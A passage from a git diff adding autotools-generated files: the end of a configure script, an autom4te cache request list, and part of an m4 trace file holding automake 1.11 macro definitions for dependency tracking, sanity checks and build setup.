know have understand at least 4000. + if sed -n 's,^#.*generated by automake.*,X,p' "$mf" | grep X >/dev/null 2>&1; then + dirpart=`$as_dirname -- "$mf" || +$as_expr X"$mf" : 'X\(.*[^/]\)//*[^/][^/]*/*$' \| \ + X"$mf" : 'X\(//\)[^/]' \| \ + X"$mf" : 'X\(//\)$' \| \ + X"$mf" : 'X\(/\)' \| . 2>/dev/null || +$as_echo X"$mf" | + sed '/^X\(.*[^/]\)\/\/*[^/][^/]*\/*$/{ + s//\1/ + q + } + /^X\(\/\/\)[^/].*/{ + s//\1/ + q + } + /^X\(\/\/\)$/{ + s//\1/ + q + } + /^X\(\/\).*/{ + s//\1/ + q + } + s/.*/./; q'` + else + continue + fi + # Extract the definition of DEPDIR, am__include, and am__quote + # from the Makefile without running `make'. + DEPDIR=`sed -n 's/^DEPDIR = //p' < "$mf"` + test -z "$DEPDIR" && continue + am__include=`sed -n 's/^am__include = //p' < "$mf"` + test -z "am__include" && continue + am__quote=`sed -n 's/^am__quote = //p' < "$mf"` + # When using ansi2knr, U may be empty or an underscore; expand it + U=`sed -n 's/^U = //p' < "$mf"` + # Find all dependency output files, they are included files with + # $(DEPDIR) in their names. We invoke sed twice because it is the + # simplest approach to changing $(DEPDIR) to its actual value in the + # expansion. + for file in `sed -n " + s/^$am__include $am__quote\(.*(DEPDIR).*\)$am__quote"'$/\1/p' <"$mf" | \ + sed -e 's/\$(DEPDIR)/'"$DEPDIR"'/g' -e 's/\$U/'"$U"'/g'`; do + # Make sure the directory exists. + test -f "$dirpart/$file" && continue + fdir=`$as_dirname -- "$file" || +$as_expr X"$file" : 'X\(.*[^/]\)//*[^/][^/]*/*$' \| \ + X"$file" : 'X\(//\)[^/]' \| \ + X"$file" : 'X\(//\)$' \| \ + X"$file" : 'X\(/\)' \| . 2>/dev/null || +$as_echo X"$file" | + sed '/^X\(.*[^/]\)\/\/*[^/][^/]*\/*$/{ + s//\1/ + q + } + /^X\(\/\/\)[^/].*/{ + s//\1/ + q + } + /^X\(\/\/\)$/{ + s//\1/ + q + } + /^X\(\/\).*/{ + s//\1/ + q + } + s/.*/./; q'` + as_dir=$dirpart/$fdir; as_fn_mkdir_p + # echo "creating $dirpart/$file" + echo '# dummy' > "$dirpart/$file" + done + done +} + ;; + + esac +done # for ac_tag + + +as_fn_exit 0 +_ACEOF +ac_clean_files=$ac_clean_files_save + +test $ac_write_fail = 0 || + as_fn_error "write failure creating $CONFIG_STATUS" "$LINENO" 5 + + +# configure is writing to config.log, and then calls config.status. +# config.status does its own redirection, appending to config.log. +# Unfortunately, on DOS this fails, as config.log is still kept open +# by configure, so config.status won't be able to write to it; its +# output is simply discarded. So we exec the FD to /dev/null, +# effectively closing config.log, so it can be properly (re)opened and +# appended to by config.status. When coming back to configure, we +# need to make the FD available again. +if test "$no_create" != yes; then + ac_cs_success=: + ac_config_status_args= + test "$silent" = yes && + ac_config_status_args="$ac_config_status_args --quiet" + exec 5>/dev/null + $SHELL $CONFIG_STATUS $ac_config_status_args || ac_cs_success=false + exec 5>>config.log + # Use ||, not &&, to avoid exiting from the if with $? = 1, which + # would make configure fail if this is the last instruction. + $ac_cs_success || as_fn_exit $? +fi +if test -n "$ac_unrecognized_opts" && test "$enable_option_checking" != no; then + { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: unrecognized options: $ac_unrecognized_opts" >&5 +$as_echo "$as_me: WARNING: unrecognized options: $ac_unrecognized_opts" >&2;} +fi + diff --git a/autom4te.cache/requests b/autom4te.cache/requests new file mode 100644 index 0000000..cdb63d9 --- /dev/null +++ b/autom4te.cache/requests @@ -0,0 +1,138 @@ +# This file was generated by Autom4te Tue Dec 22 07:01:21 UTC 2009. +# It contains the lists of macros which have been traced. +# It can be safely removed. + +@request = ( + bless( [ + '0', + 1, + [ + '/usr/share/autoconf' + ], + [ + '/usr/share/autoconf/autoconf/autoconf.m4f', + '/usr/share/aclocal-1.11/amversion.m4', + '/usr/share/aclocal-1.11/auxdir.m4', + '/usr/share/aclocal-1.11/cond.m4', + '/usr/share/aclocal-1.11/depend.m4', + '/usr/share/aclocal-1.11/depout.m4', + '/usr/share/aclocal-1.11/init.m4', + '/usr/share/aclocal-1.11/install-sh.m4', + '/usr/share/aclocal-1.11/lead-dot.m4', + '/usr/share/aclocal-1.11/make.m4', + '/usr/share/aclocal-1.11/minuso.m4', + '/usr/share/aclocal-1.11/missing.m4', + '/usr/share/aclocal-1.11/mkdirp.m4', + '/usr/share/aclocal-1.11/options.m4', + '/usr/share/aclocal-1.11/runlog.m4', + '/usr/share/aclocal-1.11/sanity.m4', + '/usr/share/aclocal-1.11/silent.m4', + '/usr/share/aclocal-1.11/strip.m4', + '/usr/share/aclocal-1.11/substnot.m4', + '/usr/share/aclocal-1.11/tar.m4', + 'configure.in' + ], + { + 'm4_pattern_forbid' => 1, + 'AM_SET_CURRENT_AUTOMAKE_VERSION' => 1, + '_AM_SET_OPTION' => 1, + 'AC_DEFUN' => 1, + 'AM_PROG_MKDIR_P' => 1, + 'AM_INIT_AUTOMAKE' => 1, + 'AM_AUTOMAKE_VERSION' => 1, + 'AM_MISSING_HAS_RUN' => 1, + 'AM_SUBST_NOTMAKE' => 1, + 'AM_MISSING_PROG' => 1, + 'AM_OUTPUT_DEPENDENCY_COMMANDS' => 1, + 'AC_DEFUN_ONCE' => 1, + 'AM_PROG_INSTALL_STRIP' => 1, + '_m4_warn' => 1, + 'AM_SANITY_CHECK' => 1, + 'AM_SILENT_RULES' => 1, + 'include' => 1, + '_AM_PROG_TAR' => 1, + 'AM_AUX_DIR_EXPAND' => 1, + 'AM_DEP_TRACK' => 1, + '_AM_SET_OPTIONS' => 1, + '_AM_OUTPUT_DEPENDENCY_COMMANDS' => 1, + 'AM_RUN_LOG' => 1, + '_AM_IF_OPTION' => 1, + '_AM_SUBST_NOTMAKE' => 1, + 'm4_pattern_allow' => 1, + '_AM_AUTOCONF_VERSION' => 1, + 'AM_PROG_CC_C_O' => 1, + '_AM_MANGLE_OPTION' => 1, + 'AM_CONDITIONAL' => 1, + 'AM_SET_LEADING_DOT' => 1, + 'AM_SET_DEPDIR' => 1, + '_AM_DEPENDENCIES' => 1, + 'm4_include' => 1, + 'AM_PROG_INSTALL_SH' => 1, + '_AC_AM_CONFIG_HEADER_HOOK' => 1, + 'AU_DEFUN' => 1, + 'AM_MAKE_INCLUDE' => 1 + } + ], 'Autom4te::Request' ), + bless( [ + '1', + 1, + [ + '/usr/share/autoconf' + ], + [ + '/usr/share/autoconf/autoconf/autoconf.m4f', + 'aclocal.m4', + 'configure.in' + ], + { + 'AM_PROG_F77_C_O' => 1, + '_LT_AC_TAGCONFIG' => 1, + 'AC_INIT' => 1, + 'm4_pattern_forbid' => 1, + 'AC_CANONICAL_TARGET' => 1, + '_AM_COND_IF' => 1, + 'AC_CONFIG_LIBOBJ_DIR' => 1, + 'AC_SUBST' => 1, + 'AC_CANONICAL_HOST' => 1, + 'AC_FC_SRCEXT' => 1, + 'AC_PROG_LIBTOOL' => 1, + 'AM_INIT_AUTOMAKE' => 1, + 'AC_CONFIG_SUBDIRS' => 1, + 'AM_AUTOMAKE_VERSION' => 1, + 'LT_CONFIG_LTDL_DIR' => 1, + 'AC_CONFIG_LINKS' => 1, + 'AC_REQUIRE_AUX_FILE' => 1, + 'LT_SUPPORTED_TAG' => 1, + 'm4_sinclude' => 1, + 'AM_MAINTAINER_MODE' => 1, + 'AM_GNU_GETTEXT_INTL_SUBDIR' => 1, + '_m4_warn' => 1, + 'AM_PROG_CXX_C_O' => 1, + '_AM_COND_ENDIF' => 1, + 'AM_ENABLE_MULTILIB' => 1, + 'AM_SILENT_RULES' => 1, + 'AC_CONFIG_FILES' => 1, + 'LT_INIT' => 1, + 'include' => 1, + 'AM_GNU_GETTEXT' => 1, + 'AC_LIBSOURCE' => 1, + 'AC_CANONICAL_BUILD' => 1, + 'AM_PROG_FC_C_O' => 1, + 'AC_FC_FREEFORM' => 1, + 'AH_OUTPUT' => 1, + 'AC_CONFIG_AUX_DIR' => 1, + '_AM_SUBST_NOTMAKE' => 1, + 'AM_PROG_CC_C_O' => 1, + 'm4_pattern_allow' => 1, + 'sinclude' => 1, + 'AM_CONDITIONAL' => 1, + 'AC_CANONICAL_SYSTEM' => 1, + 'AC_CONFIG_HEADERS' => 1, + 'AC_DEFINE_TRACE_LITERAL' => 1, + 'm4_include' => 1, + '_AM_COND_ELSE' => 1, + 'AC_SUBST_TRACE' => 1 + } + ], 'Autom4te::Request' ) + ); + diff --git a/autom4te.cache/traces.0 b/autom4te.cache/traces.0 new file mode 100644 index 0000000..a7b62e9 --- /dev/null +++ b/autom4te.cache/traces.0 @@ -0,0 +1,805 @@ +m4trace:/usr/share/aclocal-1.11/amversion.m4:14: -1- AC_DEFUN([AM_AUTOMAKE_VERSION], [am__api_version='1.11' +dnl Some users find AM_AUTOMAKE_VERSION and mistake it for a way to +dnl require some minimum version. Point them to the right macro. +m4_if([$1], [1.11.1], [], + [AC_FATAL([Do not call $0, use AM_INIT_AUTOMAKE([$1]).])])dnl +]) +m4trace:/usr/share/aclocal-1.11/amversion.m4:33: -1- AC_DEFUN([AM_SET_CURRENT_AUTOMAKE_VERSION], [AM_AUTOMAKE_VERSION([1.11.1])dnl +m4_ifndef([AC_AUTOCONF_VERSION], + [m4_copy([m4_PACKAGE_VERSION], [AC_AUTOCONF_VERSION])])dnl +_AM_AUTOCONF_VERSION(m4_defn([AC_AUTOCONF_VERSION]))]) +m4trace:/usr/share/aclocal-1.11/auxdir.m4:47: -1- AC_DEFUN([AM_AUX_DIR_EXPAND], [dnl Rely on autoconf to set up CDPATH properly. +AC_PREREQ([2.50])dnl +# expand $ac_aux_dir to an absolute path +am_aux_dir=`cd $ac_aux_dir && pwd` +]) +m4trace:/usr/share/aclocal-1.11/cond.m4:15: -1- AC_DEFUN([AM_CONDITIONAL], [AC_PREREQ(2.52)dnl + ifelse([$1], [TRUE], [AC_FATAL([$0: invalid condition: $1])], + [$1], [FALSE], [AC_FATAL([$0: invalid condition: $1])])dnl +AC_SUBST([$1_TRUE])dnl +AC_SUBST([$1_FALSE])dnl +_AM_SUBST_NOTMAKE([$1_TRUE])dnl +_AM_SUBST_NOTMAKE([$1_FALSE])dnl +m4_define([_AM_COND_VALUE_$1], [$2])dnl +if $2; then + $1_TRUE= + $1_FALSE='#' +else + $1_TRUE='#' + $1_FALSE= +fi +AC_CONFIG_COMMANDS_PRE( +[if test -z "${$1_TRUE}" && test -z "${$1_FALSE}"; then + AC_MSG_ERROR([[conditional "$1" was never defined. +Usually this means the macro was only invoked conditionally.]]) +fi])]) +m4trace:/usr/share/aclocal-1.11/depend.m4:28: -1- AC_DEFUN([_AM_DEPENDENCIES], [AC_REQUIRE([AM_SET_DEPDIR])dnl +AC_REQUIRE([AM_OUTPUT_DEPENDENCY_COMMANDS])dnl +AC_REQUIRE([AM_MAKE_INCLUDE])dnl +AC_REQUIRE([AM_DEP_TRACK])dnl + +ifelse([$1], CC, [depcc="$CC" am_compiler_list=], + [$1], CXX, [depcc="$CXX" am_compiler_list=], + [$1], OBJC, [depcc="$OBJC" am_compiler_list='gcc3 gcc'], + [$1], UPC, [depcc="$UPC" am_compiler_list=], + [$1], GCJ, [depcc="$GCJ" am_compiler_list='gcc3 gcc'], + [depcc="$$1" am_compiler_list=]) + +AC_CACHE_CHECK([dependency style of $depcc], + [am_cv_$1_dependencies_compiler_type], +[if test -z "$AMDEP_TRUE" && test -f "$am_depcomp"; then + # We make a subdir and do the tests there. Otherwise we can end up + # making bogus files that we don't know about and never remove. For + # instance it was reported that on HP-UX the gcc test will end up + # making a dummy file named `D' -- because `-MD' means `put the output + # in D'. + mkdir conftest.dir + # Copy depcomp to subdir because otherwise we won't find it if we're + # using a relative directory. + cp "$am_depcomp" conftest.dir + cd conftest.dir + # We will build objects and dependencies in a subdirectory because + # it helps to detect inapplicable dependency modes. For instance + # both Tru64's cc and ICC support -MD to output dependencies as a + # side effect of compilation, but ICC will put the dependencies in + # the current directory while Tru64 will put them in the object + # directory. + mkdir sub + + am_cv_$1_dependencies_compiler_type=none + if test "$am_compiler_list" = ""; then + am_compiler_list=`sed -n ['s/^#*\([a-zA-Z0-9]*\))$/\1/p'] < ./depcomp` + fi + am__universal=false + m4_case([$1], [CC], + [case " $depcc " in #( + *\ -arch\ *\ -arch\ *) am__universal=true ;; + esac], + [CXX], + [case " $depcc " in #( + *\ -arch\ *\ -arch\ *) am__universal=true ;; + esac]) + + for depmode in $am_compiler_list; do + # Setup a source with many dependencies, because some compilers + # like to wrap large dependency lists on column 80 (with \), and + # we should not choose a depcomp mode which is confused by this. + # + # We need to recreate these files for each test, as the compiler may + # overwrite some of them when testing with obscure command lines. + # This happens at least with the AIX C compiler. + : > sub/conftest.c + for i in 1 2 3 4 5 6; do + echo '#include "conftst'$i'.h"' >> sub/conftest.c + # Using `: > sub/conftst$i.h' creates only sub/conftst1.h with + # Solaris 8's {/usr,}/bin/sh. + touch sub/conftst$i.h + done + echo "${am__include} ${am__quote}sub/conftest.Po${am__quote}" > confmf + + # We check with `-c' and `-o' for the sake of the "dashmstdout" + # mode. It turns out that the SunPro C++ compiler does not properly + # handle `-M -o', and we need to detect this. Also, some Intel + # versions had trouble with output in subdirs + am__obj=sub/conftest.${OBJEXT-o} + am__minus_obj="-o $am__obj" + case $depmode in + gcc) + # This depmode causes a compiler race in universal mode. + test "$am__universal" = false || continue + ;; + nosideeffect) + # after this tag, mechanisms are not by side-effect, so they'll + # only be used when explicitly requested + if test "x$enable_dependency_tracking" = xyes; then + continue + else + break + fi + ;; + msvisualcpp | msvcmsys) + # This compiler won't grok `-c -o', but also, the minuso test has + # not run yet. These depmodes are late enough in the game, and + # so weak that their functioning should not be impacted. + am__obj=conftest.${OBJEXT-o} + am__minus_obj= + ;; + none) break ;; + esac + if depmode=$depmode \ + source=sub/conftest.c object=$am__obj \ + depfile=sub/conftest.Po tmpdepfile=sub/conftest.TPo \ + $SHELL ./depcomp $depcc -c $am__minus_obj sub/conftest.c \ + >/dev/null 2>conftest.err && + grep sub/conftst1.h sub/conftest.Po > /dev/null 2>&1 && + grep sub/conftst6.h sub/conftest.Po > /dev/null 2>&1 && + grep $am__obj sub/conftest.Po > /dev/null 2>&1 && + ${MAKE-make} -s -f confmf > /dev/null 2>&1; then + # icc doesn't choke on unknown options, it will just issue warnings + # or remarks (even with -Werror). So we grep stderr for any message + # that says an option was ignored or not supported. + # When given -MP, icc 7.0 and 7.1 complain thusly: + # icc: Command line warning: ignoring option '-M'; no argument required + # The diagnosis changed in icc 8.0: + # icc: Command line remark: option '-MP' not supported + if (grep 'ignoring option' conftest.err || + grep 'not supported' conftest.err) >/dev/null 2>&1; then :; else + am_cv_$1_dependencies_compiler_type=$depmode + break + fi + fi + done + + cd .. + rm -rf conftest.dir +else + am_cv_$1_dependencies_compiler_type=none +fi +]) +AC_SUBST([$1DEPMODE], [depmode=$am_cv_$1_dependencies_compiler_type]) +AM_CONDITIONAL([am__fastdep$1], [ + test "x$enable_dependency_tracking" != xno \ + && test "$am_cv_$1_dependencies_compiler_type" = gcc3]) +]) +m4trace:/usr/share/aclocal-1.11/depend.m4:163: -1- AC_DEFUN([AM_SET_DEPDIR], [AC_REQUIRE([AM_SET_LEADING_DOT])dnl +AC_SUBST([DEPDIR], ["${am__leading_dot}deps"])dnl +]) +m4trace:/usr/share/aclocal-1.11/depend.m4:171: -1- AC_DEFUN([AM_DEP_TRACK], [AC_ARG_ENABLE(dependency-tracking, +[ --disable-dependency-tracking speeds up one-time build + --enable-dependency-tracking do not reject slow dependency extractors]) +if test "x$enable_dependency_tracking" != xno; then + am_depcomp="$ac_aux_dir/depcomp" + AMDEPBACKSLASH='\' +fi +AM_CONDITIONAL([AMDEP], [test "x$enable_dependency_tracking" != xno]) +AC_SUBST([AMDEPBACKSLASH])dnl +_AM_SUBST_NOTMAKE([AMDEPBACKSLASH])dnl +]) +m4trace:/usr/share/aclocal-1.11/depout.m4:14: -1- AC_DEFUN([_AM_OUTPUT_DEPENDENCY_COMMANDS], [{ + # Autoconf 2.62 quotes --file arguments for eval, but not when files + # are listed without --file. Let's play safe and only enable the eval + # if we detect the quoting. + case $CONFIG_FILES in + *\'*) eval set x "$CONFIG_FILES" ;; + *) set x $CONFIG_FILES ;; + esac + shift + for mf + do + # Strip MF so we end up with the name of the file. + mf=`echo "$mf" | sed -e 's/:.*$//'` + # Check whether this is an Automake generated Makefile or not. + # We used to match only the files named `Makefile.in', but + # some people rename them; so instead we look at the file content. + # Grep'ing the first line is not enough: some people post-process + # each Makefile.in and add a new line on top of each file to say so. + # Grep'ing the whole file is not good either: AIX grep has a line + # limit of 2048, but all sed's we know have understand at least 4000. + if sed -n 's,^#.*generated by automake.*,X,p' "$mf" | grep X >/dev/null 2>&1; then + dirpart=`AS_DIRNAME("$mf")` + else + continue + fi + # Extract the definition of DEPDIR, am__include, and am__quote + # from the Makefile without running `make'. + DEPDIR=`sed -n 's/^DEPDIR = //p' < "$mf"` + test -z "$DEPDIR" && continue + am__include=`sed -n 's/^am__include = //p' < "$mf"` + test -z "am__include" && continue + am__quote=`sed -n 's/^am__quote = //p' < "$mf"` + # When using ansi2knr, U may be empty or an underscore; expand it + U=`sed -n 's/^U = //p' < "$mf"` + # Find all dependency output files, they are included files with + # $(DEPDIR) in their names. We invoke sed twice because it is the + # simplest approach to changing $(DEPDIR) to its actual value in the + # expansion. + for file in `sed -n " + s/^$am__include $am__quote\(.*(DEPDIR).*\)$am__quote"'$/\1/p' <"$mf" | \ + sed -e 's/\$(DEPDIR)/'"$DEPDIR"'/g' -e 's/\$U/'"$U"'/g'`; do + # Make sure the directory exists. + test -f "$dirpart/$file" && continue + fdir=`AS_DIRNAME(["$file"])` + AS_MKDIR_P([$dirpart/$fdir]) + # echo "creating $dirpart/$file" + echo '# dummy' > "$dirpart/$file" + done + done +} +]) +m4trace:/usr/share/aclocal-1.11/depout.m4:75: -1- AC_DEFUN([AM_OUTPUT_DEPENDENCY_COMMANDS], [AC_CONFIG_COMMANDS([depfiles], + [test x"$AMDEP_TRUE" != x"" || _AM_OUTPUT_DEPENDENCY_COMMANDS], + [AMDEP_TRUE="$AMDEP_TRUE" ac_aux_dir="$ac_aux_dir"]) +]) +m4trace:/usr/share/aclocal-1.11/init.m4:26: -1- AC_DEFUN([AM_INIT_AUTOMAKE], [AC_PREREQ([2.62])dnl +dnl Autoconf wants to disallow AM_ names. We explicitly allow +dnl the ones we care about. +m4_pattern_allow([^AM_[A-Z]+FLAGS$])dnl +AC_REQUIRE([AM_SET_CURRENT_AUTOMAKE_VERSION])dnl +AC_REQUIRE([AC_PROG_INSTALL])dnl +if test "`cd $srcdir && pwd`" != "`pwd`"; then + # Use -I$(srcdir) only when $(srcdir) != ., so that make's output + # is not polluted with repeated "-I." + AC_SUBST([am__isrc], [' -I$(srcdir)'])_AM_SUBST_NOTMAKE([am__isrc])dnl + # test to see if srcdir already configured + if test -f $srcdir/config.status; then + AC_MSG_ERROR([source directory already configured; run "make distclean" there first]) + fi +fi + +# test whether we have cygpath +if test -z "$CYGPATH_W"; then + if (cygpath --version) >/dev/null 2>/dev/null; then + CYGPATH_W='cygpath -w' + else + CYGPATH_W=echo + fi +fi +AC_SUBST([CYGPATH_W]) + +# Define the identity of the package. +dnl Distinguish between old-style and new-style calls. +m4_ifval([$2], +[m4_ifval([$3], [_AM_SET_OPTION([no-define])])dnl + AC_SUBST([PACKAGE], [$1])dnl + AC_SUBST([VERSION], [$2])], +[_AM_SET_OPTIONS([$1])dnl +dnl Diagnose old-style AC_INIT with new-style AM_AUTOMAKE_INIT. +m4_if(m4_ifdef([AC_PACKAGE_NAME], 1)m4_ifdef([AC_PACKAGE_VERSION], 1), 11,, + [m4_fatal([AC_INIT should be called with package and version arguments])])dnl + AC_SUBST([PACKAGE], ['AC_PACKAGE_TARNAME'])dnl + AC_SUBST([VERSION], ['AC_PACKAGE_VERSION'])])dnl + +_AM_IF_OPTION([no-define],, +[AC_DEFINE_UNQUOTED(PACKAGE, "$PACKAGE", [Name of package]) + AC_DEFINE_UNQUOTED(VERSION, "$VERSION", [Version number of package])])dnl + +# Some tools Automake needs. +AC_REQUIRE([AM_SANITY_CHECK])dnl +AC_REQUIRE([AC_ARG_PROGRAM])dnl +AM_MISSING_PROG(ACLOCAL, aclocal-${am__api_version}) +AM_MISSING_PROG(AUTOCONF, autoconf) +AM_MISSING_PROG(AUTOMAKE, automake-${am__api_version}) +AM_MISSING_PROG(AUTOHEADER, autoheader) +AM_MISSING_PROG(MAKEINFO, makeinfo) +AC_REQUIRE([AM_PROG_INSTALL_SH])dnl +AC_REQUIRE([AM_PROG_INSTALL_STRIP])dnl +AC_REQUIRE([AM_PROG_MKDIR_P])dnl +# We need awk for the "check" target. The system "awk" is bad on +# some platforms. +AC_REQUIRE([AC_PROG_AWK])dnl +AC_REQUIRE([AC_PROG_MAKE_SET])dnl +AC_REQUIRE([AM_SET_LEADING_DOT])dnl +_AM_IF_OPTION([tar-ustar], [_AM_PROG_TAR([ustar])], + [_AM_IF_OPTION([tar-pax], [_AM_PROG_TAR([pax])], + [_AM_PROG_TAR([v7])])]) +_AM_IF_OPTION([no-dependencies],, +[AC_PROVIDE_IFELSE([AC_PROG_CC], + [_AM_DEPENDENCIES(CC)], + [define([AC_PROG_CC], + defn([AC_PROG_CC])[_AM_DEPENDENCIES(CC)])])dnl +AC_PROVIDE_IFELSE([AC_PROG_CXX], + [_AM_DEPENDENCIES(CXX)], + [define([AC_PROG_CXX], + defn([AC_PROG_CXX])[_AM_DEPENDENCIES(CXX)])])dnl +AC_PROVIDE_IFELSE([AC_PROG_OBJC], + [_AM_DEPENDENCIES(OBJC)], + [define([AC_PROG_OBJC], + defn([AC_PROG_OBJC])[_AM_DEPENDENCIES(OBJC)])])dnl +]) +_AM_IF_OPTION([silent-rules], [AC_REQUIRE([AM_SILENT_RULES])])dnl +dnl The `parallel-tests' driver may need to know about EXEEXT, so add the +dnl `am__EXEEXT' conditional if _AM_COMPILER_EXEEXT was seen. This macro +dnl is hooked onto _AC_COMPILER_EXEEXT early, see below. +AC_CONFIG_COMMANDS_PRE(dnl +[m4_provide_if([_AM_COMPILER_EXEEXT], + [AM_CONDITIONAL([am__EXEEXT], [test -n "$EXEEXT"])])])dnl +]) +m4trace:/usr/share/aclocal-1.11/init.m4:126: -1- AC_DEFUN([_AC_AM_CONFIG_HEADER_HOOK], [# Compute $1's index in $config_headers. +_am_arg=$1 +_am_stamp_count=1 +for _am_header in $config_headers :; do + case $_am_header in + $_am_arg | $_am_arg:* ) + break ;; + * ) + _am_stamp_count=`expr $_am_stamp_count + 1` ;; + esac +done +echo "timestamp for $_am_arg" >`AS_DIRNAME(["$_am_arg"])`/stamp-h[]$_am_stamp_count]) +m4trace:/usr/share/aclocal-1.11/install-sh.m4:11: -1- AC_DEFUN([AM_PROG_INSTALL_SH], [AC_REQUIRE([AM_AUX_DIR_EXPAND])dnl +if test x"${install_sh}" != xset; then + case $am_aux_dir in + *\ * | *\ *) + install_sh="\${SHELL} '$am_aux_dir/install-sh'" ;; + *) + install_sh="\${SHELL} $am_aux_dir/install-sh" + esac +fi +AC_SUBST(install_sh)]) +m4trace:/usr/share/aclocal-1.11/lead-dot.m4:12: -1- AC_DEFUN([AM_SET_LEADING_DOT], [rm -rf .tst 2>/dev/null +mkdir .tst 2>/dev/null +if test -d .tst; then + am__leading_dot=. +else + am__leading_dot=_ +fi +rmdir .tst 2>/dev/null +AC_SUBST([am__leading_dot])]) +m4trace:/usr/share/aclocal-1.11/make.m4:14: -1- AC_DEFUN([AM_MAKE_INCLUDE], [am_make=${MAKE-make} +cat > confinc << 'END' +am__doit: + @echo this is the am__doit target +.PHONY: am__doit +END +# If we don't find an include directive, just comment out the code. +AC_MSG_CHECKING([for style of include used by $am_make]) +am__include="#" +am__quote= +_am_result=none +# First try GNU make style include. +echo "include confinc" > confmf +# Ignore all kinds of additional output from `make'. +case `$am_make -s -f confmf 2> /dev/null` in #( +*the\ am__doit\ target*) + am__include=include + am__quote= + _am_result=GNU + ;; +esac +# Now try BSD make style include. +if test "$am__include" = "#"; then + echo '.include "confinc"' > confmf + case `$am_make -s -f confmf 2> /dev/null` in #( + *the\ am__doit\ target*) + am__include=.include + am__quote="\"" + _am_result=BSD + ;; + esac +fi +AC_SUBST([am__include]) +AC_SUBST([am__quote]) +AC_MSG_RESULT([$_am_result]) +rm -f confinc confmf +]) +m4trace:/usr/share/aclocal-1.11/minuso.m4:14: -1- AC_DEFUN([AM_PROG_CC_C_O], [AC_REQUIRE([AC_PROG_CC_C_O])dnl +AC_REQUIRE([AM_AUX_DIR_EXPAND])dnl +AC_REQUIRE_AUX_FILE([compile])dnl +# FIXME: we rely on the cache variable name because +# there is no other way. +set dummy $CC +am_cc=`echo $[2] | sed ['s/[^a-zA-Z0-9_]/_/g;s/^[0-9]/_/']` +eval am_t=\$ac_cv_prog_cc_${am_cc}_c_o +if test "$am_t" != yes; then + # Losing compiler, so override with the script. + # FIXME: It is wrong to rewrite CC. + # But if we don't then we get into trouble of one sort or another. + # A longer-term fix would be to have automake use am__CC in this case, + # and then we could set am__CC="\$(top_srcdir)/compile \$(CC)" + CC="$am_aux_dir/compile $CC" +fi +dnl Make sure AC_PROG_CC is never called again, or it will override our +dnl setting of CC. +m4_define([AC_PROG_CC], + [m4_fatal([AC_PROG_CC cannot be called after AM_PROG_CC_C_O])]) +]) +m4trace:/usr/share/aclocal-1.11/missing.m4:14: -1- AC_DEFUN([AM_MISSING_PROG], [AC_REQUIRE([AM_MISSING_HAS_RUN]) +$1=${$1-"${am_missing_run}$2"} +AC_SUBST($1)]) +m4trace:/usr/share/aclocal-1.11/missing.m4:24: -1- AC_DEFUN([AM_MISSING_HAS_RUN], [AC_REQUIRE([AM_AUX_DIR_EXPAND])dnl +AC_REQUIRE_AUX_FILE([missing])dnl +if test x"${MISSING+set}" != xset; then + case $am_aux_dir in + *\ * | *\ *) + MISSING="\${SHELL} \"$am_aux_dir/missing\"" ;; + *) + MISSING="\${SHELL} $am_aux_dir/missing" ;; + esac +fi +# Use eval to expand $SHELL +if eval "$MISSING --run true"; then + am_missing_run="$MISSING --run " +else + am_missing_run= + AC_MSG_WARN([`missing' script is too old or missing]) +fi +]) +m4trace:/usr/share/aclocal-1.11/mkdirp.m4:11: -1- AC_DEFUN([AM_PROG_MKDIR_P], [AC_PREREQ([2.60])dnl +AC_REQUIRE([AC_PROG_MKDIR_P])dnl +dnl Automake 1.8 to 1.9.6 used to define mkdir_p. We now use MKDIR_P, +dnl while keeping a definition of mkdir_p for backward compatibility. +dnl @MKDIR_P@ is magic: AC_OUTPUT adjusts its value for each Makefile. +dnl However we cannot define mkdir_p as $(MKDIR_P) for the sake of +dnl Makefile.ins that do not define MKDIR_P, so we do our own +dnl adjustment using top_builddir (which is defined more often than +dnl MKDIR_P). +AC_SUBST([mkdir_p], ["$MKDIR_P"])dnl +case $mkdir_p in + [[\\/$]]* | ?:[[\\/]]*) ;; + */*) mkdir_p="\$(top_builddir)/$mkdir_p" ;; +esac +]) +m4trace:/usr/share/aclocal-1.11/options.m4:13: -1- AC_DEFUN([_AM_MANGLE_OPTION], [[_AM_OPTION_]m4_bpatsubst($1, [[^a-zA-Z0-9_]], [_])]) +m4trace:/usr/share/aclocal-1.11/options.m4:19: -1- AC_DEFUN([_AM_SET_OPTION], [m4_define(_AM_MANGLE_OPTION([$1]), 1)]) +m4trace:/usr/share/aclocal-1.11/options.m4:25: -1- AC_DEFUN([_AM_SET_OPTIONS], [m4_foreach_w([_AM_Option], [$1], [_AM_SET_OPTION(_AM_Option)])]) +m4trace:/usr/share/aclocal-1.11/options.m4:31: -1- AC_DEFUN([_AM_IF_OPTION], [m4_ifset(_AM_MANGLE_OPTION([$1]), [$2], [$3])]) +m4trace:/usr/share/aclocal-1.11/runlog.m4:12: -1- AC_DEFUN([AM_RUN_LOG], [{ echo "$as_me:$LINENO: $1" >&AS_MESSAGE_LOG_FD + ($1) >&AS_MESSAGE_LOG_FD 2>&AS_MESSAGE_LOG_FD + ac_status=$? + echo "$as_me:$LINENO: \$? = $ac_status" >&AS_MESSAGE_LOG_FD + (exit $ac_status); }]) +m4trace:/usr/share/aclocal-1.11/sanity.m4:14: -1- AC_DEFUN([AM_SANITY_CHECK], [AC_MSG_CHECKING([whether build environment is sane]) +# Just in case +sleep 1 +echo timestamp > conftest.file +# Reject unsafe characters in $srcdir or the absolute working directory +# name. Accept space and tab only in the latter. +am_lf=' +' +case `pwd` in + *[[\\\"\#\$\&\'\`$am_lf]]*) + AC_MSG_ERROR([unsafe absolute working directory name]);; +esac +case $srcdir in + *[[\\\"\#\$\&\'\`$am_lf\ \ ]]*) + AC_MSG_ERROR([unsafe srcdir value: `$srcdir']);; +esac + +# Do `set' in a subshell so we don't clobber the current shell's +# arguments. Must try -L first in case configure is actually a +# symlink; some systems play weird games with the mod time of symlinks +# (eg FreeBSD returns the mod time of the symlink's containing +# directory). +if ( + set X `ls -Lt "$srcdir/configure" conftest.file 2> /dev/null` + if test "$[*]" = "X"; then + # -L didn't work. + set X `ls -t "$srcdir/configure" conftest.file` + fi + rm -f conftest.file + if test "$[*]" != "X $srcdir/configure conftest.file" \ + && test "$[*]" != "X conftest.file $srcdir/configure"; then + + # If neither matched, then we have a broken ls. This can happen + # if, for instance, CONFIG_SHELL is bash and it inherits a + # broken ls alias from the environment. This has actually + # happened. Such a system could not be considered "sane". + AC_MSG_ERROR([ls -t appears to fail. Make sure there is not a broken +alias in your environment]) + fi + + test "$[2]" = conftest.file + ) +then + # Ok. + : +else + 